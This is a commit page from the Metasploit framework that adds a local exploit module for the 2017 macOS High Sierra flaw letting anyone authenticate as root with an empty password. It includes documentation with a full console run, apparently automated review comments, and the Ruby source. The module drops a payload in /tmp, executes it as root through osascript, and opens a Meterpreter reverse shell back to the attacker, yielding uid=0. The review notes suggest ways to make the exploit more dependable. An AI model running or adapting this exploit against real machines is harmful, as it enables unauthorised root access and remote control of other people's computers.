Land rapid7#9255, add local exploit for osx root login with no password
bwatters-r7 committed Nov 29, 2017

2 parents e73ba0b + 9dc3d60 commit c695828
Showing 2 changed files with 159 additions and 0 deletions.
104 changes: 104 additions & 0 deletions documentation/modules/exploit/osx/local/root_no_password.md
@@ -0,0 +1,104 @@
## Vulnerable Application
This vulnerability works against OSX 10.13 (High Sierra). Early
research (https://objective-see.com/blog/blog_0x24.html) suggests that
the vulnerability is the result of multiple errors ultimately started by
an incorrect return value from triggered by the function
`od_verify_crypt_password` returning true even if the account is
disabled. The subsequent function calls appear to validate and create
the password, though there is still a lot of research into the bug and
these results should be verified once more research has been published.

## Verification Steps
1. Get a session on a vulnerable system
2. `use exploit/osx/local/root_no_password`
3. `set lhost <IP>`
4. `set lport <PORT>`
5. `set session <session_id>`
6. `run`

## Scenarios
### Example Run
```
msf exploit(psexec) > use exploit/multi/handler
msf exploit(handler) > set payload osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
httpserver[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <OSX_IP>:49347) at 2017-11-29 07:28:32 -0600
meterpreter > sysinfo
Computer : msfusers-Mac.local
OS : (MacOSX 17.0.0)
Architecture : x64
Meterpreter : x64/osx
meterpreter > getuid
Server username: uid=501, gid=20, euid=501, egid=20
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/osx/local/root_no_password
msf exploit(root_no_password) > show options
Module options (exploit/osx/local/root_no_password):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (osx/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Mac OS X 10.13.1 High Sierra x64 (Native Payload)
msf exploit(root_no_password) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(root_no_password) > set lport 4562
lport => 4562
msf exploit(root_no_password) > set session 1
session => 1
msf exploit(root_no_password) > run
[*] Started reverse TCP handler on <MSF_IP>:4562
[*] Writing payload file as '/tmp/cinbvsmrmyxw'
[*] Meterpreter session 2 opened (<MSF_IP>:4562 -> <OSX_IP>:62522) at 2017-11-29 07:29:56 -0600
[*] <OSX_IP> - Meterpreter session 2 closed. Reason: Died
[*] Executing payload file as '/tmp/cinbvsmrmyxw'
[!] This exploit may require manual cleanup of '/tmp/cinbvsmrmyxw' on the target
[-] Invalid session identifier: 2
msf exploit(root_no_password) >
msf exploit(root_no_password) >
msf exploit(root_no_password) > run
[*] Started reverse TCP handler on <MSF_IP>:4562
[*] Writing payload file as '/tmp/imtjkakowanv'
[*] Executing payload file as '/tmp/imtjkakowanv'
[*] Meterpreter session 3 opened (<MSF_IP>:4562 -> <OSX_IP>:49348) at 2017-11-29 07:30:53 -0600
[+] Deleted /tmp/imtjkakowanv
meterpreter > sysinfo
Computer : msfusers-Mac.local
OS : (MacOSX 17.0.0)
Architecture : x64
Meterpreter : x64/osx
meterpreter > getuid
Server username: uid=0, gid=20, euid=0, egid=20
meterpreter >
```
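Review bot: the Vulnerable Application paragraph contains a garbled sentence ("an incorrect return value from triggered by the function `od_verify_crypt_password` returning true") that should be rewritten to state the claim plainly, e.g. "ultimately triggered by `od_verify_crypt_password` returning true even when the account is disabled". The Example Run also records a first attempt in which session 2 dies and the module prints "[-] Invalid session identifier: 2" before a second `run` succeeds; either trim that failed attempt or add one sentence explaining it, otherwise readers will take the module to be flaky. Since the same paragraph says the subsequent calls validate and create the password, the documentation should also spell out the side effect on the target: after a successful run the root account is left enabled with an empty password, which an operator must record and revert, whereas the `[!] This exploit may require manual cleanup` warning in the transcript covers only the dropped `/tmp` payload file.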
55 changes: 55 additions & 0 deletions modules/exploits/osx/local/root_no_password.rb
@@ -0,0 +1,55 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => 'Mac OS X Root Privilege Escalation',
'Description' => %q{
This module exploits a serious flaw in MacOSX High Sierra.
Any user can login with user "root", leaving an empty password.
},
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ],
[ 'URL', 'https://news.ycombinator.com/item?id=15800676' ],
[ 'URL', 'https://forums.developer.apple.com/thread/79235' ],
],
'Platform' => 'osx',
'Arch' => ARCH_X64,
'DefaultOptions' =>
{
'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
},
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [
[ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 29 2017'
))
end

def exploit_cmd(root_payload)
"osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'"
end

def exploit
payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
print_status("Writing payload file as '#{payload_file}'")
write_file(payload_file, payload.raw)
register_file_for_cleanup(payload_file)
output = cmd_exec("chmod +x #{payload_file}")
print_status("Executing payload file as '#{payload_file}'")
cmd_exec(exploit_cmd(payload_file))
end
end
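Review bot: `exploit` runs unconditionally and never confirms that the session is on a vulnerable High Sierra build; add a `check` method (or at least a version test at the top of `exploit`), since the `Targets` entry names "Mac OS X 10.13.1 High Sierra" but nothing in the module enforces it. Smaller points in the same method: `output` on the `chmod +x` line is assigned but never used, so either drop the assignment or log it; the return value of `write_file` is not checked, so a failed write proceeds straight to execution; and `cmd_exec(exploit_cmd(payload_file))` waits for the osascript command to return, which for a payload that keeps running means the call only comes back on timeout, so consider backgrounding the payload inside the shell script (for example by appending `&`) so control returns to the console promptly. In `exploit_cmd`, `root_payload` is interpolated into an AppleScript string literal without any escaping, which is safe here only because `payload_file` comes from `Rex::Text::rand_text_alpha_lower`; a comment stating that assumption would stop a future caller from passing an arbitrary path containing quotes or backslashes.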
